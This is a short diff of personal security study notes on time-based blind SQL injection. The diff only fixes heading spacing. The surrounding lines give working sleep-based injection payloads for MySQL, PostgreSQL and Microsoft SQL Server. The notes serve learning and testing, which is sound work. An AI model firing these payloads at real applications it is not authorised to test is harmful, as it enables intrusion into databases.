amalkumar1124/cybersecurity-notes/web-security/sqli.md

 Used when the database does not show any visual differences in the response.
 The attacker forces the database to pause (sleep) before responding to verify if a condition is True.

-1.MySQL Payload:
+1. MySQL Payload:

 ' AND IF(1=1, SLEEP(5), 0) -- -

-2.PostgreSQL Payload:
+2. PostgreSQL Payload:

 ' AND (SELECT 1 FROM PG_SLEEP(5)) -- -

-3.Microsoft SQL Server Payload:
+3. Microsoft SQL Server Payload:

 ' IF(1=1) WAITFOR DELAY '0:0:5' -- -